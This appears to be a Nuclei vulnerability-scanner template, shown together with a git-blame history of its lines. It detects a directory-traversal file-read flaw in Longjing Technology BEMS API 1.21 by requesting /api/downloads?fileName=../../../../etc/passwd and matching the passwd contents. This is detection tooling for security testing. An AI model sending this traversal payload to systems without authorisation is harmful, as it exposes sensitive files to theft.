nuclei-templates/http/vulnerabilities/other/bems-api-lfi.yaml

id: bems-api-lfi

info:
  name: Longjing Technology BEMS API 1.21 - Local File Inclusion
  author: gy741
  severity: high
  description: Longjing Technology BEMS API 1.21 is vulnerable to local file inclusion. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
    - https://packetstormsecurity.com/files/163702/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100c23364bc1edb9b12d6360534784f7909102eaa2b7d6ade0a4ec84cf5d45acc55022100ce9a9757a3391cd8fd9287eb0bb043335ba1dea6c218aef73d2bb6828a37781e:922c64590222798bb761d5b6d8e72950
Update and rename longjing-technology-bems-api-lfi.yaml to bems-api-lfi.yaml 2021-08-03 14:25:25 +00:00			`id: bems-api-lfi`
Create longjing-technology-bems-api-lfi.yaml The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-08-03 12:52:14 +00:00
			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`name: Longjing Technology BEMS API 1.21 - Local File Inclusion`
Create longjing-technology-bems-api-lfi.yaml The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-08-03 12:52:14 +00:00			`author: gy741`
			`severity: high`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`description: Longjing Technology BEMS API 1.21 is vulnerable to local file inclusion. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`- https://packetstormsecurity.com/files/163702/`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: lfi,packetstorm`
Create longjing-technology-bems-api-lfi.yaml The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-08-03 12:52:14 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create longjing-technology-bems-api-lfi.yaml The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-08-03 12:52:14 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "root:.*:0:0:"`
Create longjing-technology-bems-api-lfi.yaml The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-08-03 12:52:14 +00:00
			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4b0a00483046022100c23364bc1edb9b12d6360534784f7909102eaa2b7d6ade0a4ec84cf5d45acc55022100ce9a9757a3391cd8fd9287eb0bb043335ba1dea6c218aef73d2bb6828a37781e:922c64590222798bb761d5b6d8e72950`